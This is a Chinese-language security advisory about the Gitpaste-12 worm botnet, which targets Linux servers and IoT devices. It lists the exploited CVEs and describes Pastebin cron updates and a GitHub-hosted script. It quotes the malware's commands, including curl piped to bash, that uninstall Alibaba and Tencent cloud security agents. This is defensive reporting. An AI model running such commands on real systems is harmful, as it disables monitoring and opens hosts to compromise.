蠕蟲惡意程式Gitpaste-12,鎖定Linux伺服器與IoT裝置

風險等級: 高度威脅
摘 要: 病毒通告:蠕蟲惡意程式 Gitpaste-12,鎖定Linux伺服器與IoT裝置
解決辦法: 資安研究團隊 Juniper Threat Labs於今年10月15日發現Gitpaste-12,即通報GitHub與Pastebin,相關URL與儲存貯體皆已於10月30日被關閉,因此暫時防止Gitpaste-12擴散。
細節描述: 網通設備業者 Juniper之資安研究團隊Juniper Threat Labs,揭露新種蠕蟲殭屍網路病毒(Worming Botnet),因其同時透過合法網站GitHub與Pastebin代管攻擊模組程式碼,且迄今可載入至少12種不同之攻擊模組,故將其命名為
Gitpaste-12。研究團隊指出,該病毒目前鎖定Linux x86伺服器與基於Linux Arm或MIPS處理器之IoT裝置展開攻擊。根據這個威脅實驗室的調查,Gitpaste-12利用11個已知漏洞及Telnet暴力破解進行散布與感染,已知漏洞包括
CVE-2017-14135
CVE-2020-24217
CVE-2017-5638
CVE-2020-10987
CVE-2014-8361
CVE-2020-15893
CVE-2013-5948
CVE-2019-10758
CVE-2017-17215
EDB-ID:48225
EDB-ID:40500

成功入侵系統,Gitpaste-12會設定自Pastebin下載程式碼之排程工作(Cron Job),以平均每分鐘1次之頻率呼叫並執行腳本程式,用以進行自我更新;然後再至GitHub下載並執行腳本程式shadu1(https://raw.githubusercontent[.]com/cnmnmsl-001/-/master/shadu1),該程式功能為關閉系統安全防護功能,如關閉防火牆規則、Linux安全模組SELinux與AppArmor及監控軟體等防護機制。此外,研究團隊指出,腳本程式shadu1以簡體中文撰寫程式註解,並發現該程式內包括關閉阿里雲(Alibaba Cloud)與騰訊雲(Tencent Cloud)之資安防護功能指令,
指令如下:
curl http://update.aegis.aliyun.com/download/uninstall.sh | bash
curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
顯示Gitpaste-12主要攻擊由阿里巴巴集團或騰訊提供之公有雲端運算基礎設施,其他能力還包括執行門羅幣的挖礦任務。

參考資訊: NCCST
Juniper